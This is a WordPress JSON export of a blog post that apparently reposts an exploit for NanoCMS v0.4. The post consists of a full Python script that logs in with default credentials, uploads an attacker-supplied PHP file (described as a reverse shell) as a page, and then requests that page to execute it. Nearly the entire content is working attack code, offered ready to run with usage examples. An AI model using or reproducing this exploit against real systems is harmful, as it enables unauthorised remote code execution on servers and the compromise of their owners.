{"id":28836,"date":"2022-08-01T20:38:48","date_gmt":"2022-08-01T16:38:48","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167901\/nanocms04-exec.txt"},"modified":"2022-08-02T08:34:47","modified_gmt":"2022-08-02T04:04:47","slug":"nanocms-0-4-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/nanocms-0-4-remote-code-execution\/","title":{"rendered":"NanoCMS 0.4 Remote Code Execution"},"content":{"rendered":"

# Exploit Title: NanoCMS v0.4 – Remote Code Execution (RCE) (Authenticated)
\n# Date: 2022-07-26
\n# Exploit Auuthor: p1ckzi
\n# Vendor Homepage: https:\/\/github.com\/kalyan02\/NanoCMS
\n# Version: NanoCMS v0.4
\n# Tested on: Linux Mint 20.3
\n# CVE: N\/A
\n#
\n# Description:
\n# this script uploads a php reverse shell to the target.
\n# NanoCMS does not sanitise the data of an authenticated user while creating
\n# webpages. pages are saved with .php extensions by default, allowing an
\n# authenticated attacker access to the underlying system:
\n# https:\/\/github.com\/ishell\/Exploits-Archives\/blob\/master\/2009-exploits\/0904-exploits\/nanocms-multi.txt<\/p>\n

#!\/usr\/bin\/env python3<\/p>\n

import argparse
\nimport bs4
\nimport errno
\nimport re
\nimport requests
\nimport secrets
\nimport sys<\/p>\n

def arguments():
\nparser = argparse.ArgumentParser(
\nformatter_class=argparse.RawDescriptionHelpFormatter,
\ndescription=f”{sys.argv[0]} exploits authenticated file upload”
\n“\\nand remote code execution in NanoCMS v0.4″,
\nepilog=f”examples:”
\nf”\\n\\tpython3 {sys.argv[0]} http:\/\/10.10.10.10\/ rev.php”
\nf”\\n\\tpython3 {sys.argv[0]} http:\/\/hostname:8080 rev-shell.php -a”
\nf”\\n\\t.\/{sys.argv[0]} https:\/\/10.10.10.10 rev-shell -n -e -u ‘user'”
\n)
\nparser.add_argument(
\n“address”, help=”schema\/ip\/hostname, port, sub-directories”
\n” to the vulnerable NanoCMS server”
\n)
\nparser.add_argument(
\n“file”, help=”php file to upload”
\n)
\nparser.add_argument(
\n“-u”, “–user”, help=”username”, default=”admin”
\n)
\nparser.add_argument(
\n“-p”, “–passwd”, help=”password”, default=”demo”
\n)
\nparser.add_argument(
\n“-e”, “–execute”, help=”attempts to make a request to the uploaded”
\n” file (more useful if uploading a reverse shell)”,
\naction=”store_true”, default=False
\n)
\nparser.add_argument(
\n“-a”, “–accessible”, help=”turns off features”
\n” which may negatively affect screen readers”,
\naction=”store_true”, default=False
\n)
\nparser.add_argument(
\n“-n”, “–no-colour”, help=”removes colour output”,
\naction=”store_true”, default=False
\n)
\narguments.option = parser.parse_args()<\/p>\n

# settings for terminal output defined by user in term_settings().
\nclass settings():
\n# colours.
\nc0 = “”
\nc1 = “”
\nc2 = “”<\/p>\n

# information boxes.
\ni1 = “”
\ni2 = “”
\ni3 = “”
\ni4 = “”<\/p>\n

# checks for terminal setting flags supplied by arguments().
\ndef term_settings():
\nif arguments.option.accessible:
\nsmall_banner()
\nelif arguments.option.no_colour:
\nsettings.i1 = “[+] ”
\nsettings.i2 = “[!] ”
\nsettings.i3 = “[i] ”
\nsettings.i4 = “$ ”
\nbanner()
\nelif not arguments.option.accessible or arguments.option.no_colour:
\nsettings.c0 = “\\u001b[0m” # reset.
\nsettings.c1 = “\\u001b[38;5;1m” # red.
\nsettings.c2 = “\\u001b[38;5;2m” # green.
\nsettings.i1 = “[+] ”
\nsettings.i2 = “[!] ”
\nsettings.i3 = “[i] ”
\nsettings.i4 = “$ ”
\nbanner()
\nelse:
\nprint(“something went horribly wrong!”)
\nsys.exit()<\/p>\n

# default terminal banner (looks prettier when run lol)
\ndef banner():
\nprint(
\n“\\n .__ .__”
\n” .__ ”
\n“\\n ____ _____ ____ ____ ____ _____ _____| |__ ____ | ”
\n“| | | ”
\n“\\n \/ \\\\__ \\\\ \/ \\\\ \/ _ \\\\_\/ ___\\\\ \/ \\\\ \/ ___\/ | \\\\_\/ ”
\n“__ \\\\| | | | ”
\n“\\n| | \\\\\/ __ \\\\| | ( <_> ) \\\\___| Y Y \\\\___ \\\\| Y \\\\ _”
\n“__\/| |_| |__”
\n“\\n|___| (____ \/___| \/\\\\____\/ \\\\___ >__|_| \/____ >___| \/\\\\___ ”
\n“>____\/____\/”
\n“\\n \\\\\/ \\\\\/ \\\\\/ \\\\\/ \\\\\/ \\\\\/ \\\\\/ ”
\n” \\\\\/”
\n)<\/p>\n

def small_banner():
\nprint(
\nf”{sys.argv[0]}”
\n“\\nNanoCMS authenticated file upload and rce…”
\n)<\/p>\n

# appends a ‘\/’ if not supplied at the end of the address.
\ndef address_check(address):
\ncheck = re.search(‘\/$’, address)
\nif check is not None:
\nprint(”)
\nelse:
\narguments.option.address += “\/”<\/p>\n

# creates a new filename for each upload.
\n# errors occur if the filename is the same as a previously uploaded one.
\ndef random_filename():
\nrandom_filename.name = secrets.token_hex(4)<\/p>\n

# note: after a successful login, credentials are saved, so further reuse
\n# of the script will most likely not require correct credentials.
\ndef login(address, user, passwd):
\npost_header = {
\n“User-Agent”: “Mozilla\/5.0 (X11; Linux x86_64; rv:91.0) ”
\n“Gecko\/20100101 Firefox\/91.0”,
\n“Accept”: “text\/html,application\/xhtml+xml,”
\n“application\/xml;q=0.9,image\/webp,*\/*;q=0.8”,
\n“Accept-Language”: “en-US,en;q=0.5”,
\n“Accept-Encoding”: “gzip, deflate”,
\n“Content-Type”: “application\/x-www-form-urlencoded”,
\n“Content-Length”: “”,
\n“Connection”: “close”,
\n“Referer”: f”{arguments.option.address}data\/nanoadmin.php”,
\n“Cookie”: “PHPSESSID=46ppbqohiobpvvu6olm51ejlq5”,
\n“Upgrade-Insecure-Requests”: “1”,
\n}
\npost_data = {
\n“user”: f”{user}”,
\n“pass”: f”{passwd}”
\n}<\/p>\n

url_request = requests.post(
\naddress + ‘data\/nanoadmin.php?’,
\nheaders=post_header,
\ndata=post_data,
\nverify=False,
\ntimeout=30
\n)
\nsignin_error = url_request.text
\nif ‘Error : wrong Username or Password’ in signin_error:
\nprint(
\nf”{settings.c1}{settings.i2}could ”
\nf”sign in with {arguments.option.user}\/”
\nf”{arguments.option.passwd}.{settings.c0}”
\n)
\nsys.exit(1)
\nelse:
\nprint(
\nf”{settings.c2}{settings.i1}logged in successfully.”
\nf”{settings.c0}”
\n)<\/p>\n

def exploit(address, file, name):
\nwith open(arguments.option.file, ‘r’) as file:
\nfile_contents = file.read().rstrip()
\npost_header = {
\n“User-Agent”: “Mozilla\/5.0 (X11; Linux x86_64; rv:91.0) ”
\n“Gecko\/20100101 Firefox\/91.0”,
\n“Accept”: “text\/html,application\/xhtml+xml,”
\n“application\/xml;q=0.9,image\/webp,*\/*;q=0.8”,
\n“Accept-Language”: “en-US,en;q=0.5”,
\n“Accept-Encoding”: “gzip, deflate”,
\n“Content-Type”: “application\/x-www-form-urlencoded”,
\n“Content-Length”: “”,
\n“Connection”: “close”,
\n“Referer”: f”{arguments.option.address}data\/nanoadmin.php?action=”
\n“addpage”,
\n“Cookie”: “PHPSESSID=46ppbqohiobpvvu6olm51ejlq5”,
\n“Upgrade-Insecure-Requests”: “1”,
\n}<\/p>\n

post_data = {
\n“title”: f”{random_filename.name}”,
\n“save”: “Add Page”,
\n“check_sidebar”: “sidebar”,
\n“content”: f”{file_contents}”
\n}<\/p>\n

url_request = requests.post(
\naddress + ‘data\/nanoadmin.php?action=addpage’,
\nheaders=post_header,
\ndata=post_data,
\nverify=False,
\ntimeout=30
\n)
\nif url_request.status_code == 404:
\nprint(
\nf”{settings.c1}{settings.i2}{arguments.option.address} could ”
\nf”not be uploaded.{settings.c0}”
\n)
\nsys.exit(1)
\nelse:
\nprint(
\nf”{settings.c2}{settings.i1}file posted.”
\nf”{settings.c0}”
\n)<\/p>\n

print(
\nf”{settings.i3}if successful, file location should be at:”
\nf”\\n{address}data\/pages\/{random_filename.name}.php”
\n)<\/p>\n

def execute(address, file, name):
\nprint(
\nf”{settings.i3}making web request to uploaded file.”
\n)
\nprint(
\nf”{settings.i3}check listener if reverse shell uploaded.”
\n)
\nurl_request = requests.get(
\naddress + f’data\/pages\/{random_filename.name}.php’,
\nverify=False
\n)
\nif url_request.status_code == 404:
\nprint(
\nf”{settings.c1}{settings.i2}{arguments.option.file} could ”
\nf”not be found.”
\nf”\\n{settings.i2}antivirus may be blocking your upload.”
\nf”{settings.c0}”
\n)
\nelse:
\nsys.exit()<\/p>\n

def main():
\ntry:
\narguments()
\nterm_settings()
\naddress_check(arguments.option.address)
\nrandom_filename()
\nif arguments.option.execute:
\nlogin(
\narguments.option.address,
\narguments.option.user,
\narguments.option.passwd
\n)
\nexploit(
\narguments.option.address,
\narguments.option.file,
\nrandom_filename.name,
\n)
\nexecute(
\narguments.option.address,
\narguments.option.file,
\nrandom_filename.name,
\n)
\nelse:
\nlogin(
\narguments.option.address,
\narguments.option.user,
\narguments.option.passwd
\n)
\nexploit(
\narguments.option.address,
\narguments.option.file,
\nrandom_filename.name,
\n)
\nexcept KeyboardInterrupt:
\nprint(f”\\n{settings.i3}quitting.”)
\nsys.exit()
\nexcept requests.exceptions.Timeout:
\nprint(
\nf”{settings.c1}{settings.i2}the request timed out ”
\nf”while attempting to connect.{settings.c0}”
\n)
\nsys.exit()
\nexcept requests.ConnectionError:
\nprint(
\nf”{settings.c1}{settings.i2}could not connect ”
\nf”to {arguments.option.address}{settings.c0}”
\n)
\nsys.exit()
\nexcept FileNotFoundError:
\nprint(
\nf”{settings.c1}{settings.i2}{arguments.option.file} ”
\nf”could not be found.{settings.c0}”
\n)
\nexcept (
\nrequests.exceptions.MissingSchema,
\nrequests.exceptions.InvalidURL,
\nrequests.exceptions.InvalidSchema
\n):
\nprint(
\nf”{settings.c1}{settings.i2}a valid schema and address ”
\nf”must be supplied.{settings.c0}”
\n)
\nsys.exit()<\/p>\n

if __name__ == “__main__”:
\nmain()<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: NanoCMS v0.4 – Remote Code Execution (RCE) (Authenticated) # Date: 2022-07-26 # Exploit Auuthor: p1ckzi # Vendor Homepage: https:\/\/github.com\/kalyan02\/NanoCMS # Version: NanoCMS v0.4 # Tested on: Linux Mint 20.3 # CVE: N\/A # # Description: # this script uploads a php reverse shell to the target. # NanoCMS does not sanitise the …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-28836","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28836","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=28836"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28836\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=28836"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=28836"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=28836"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}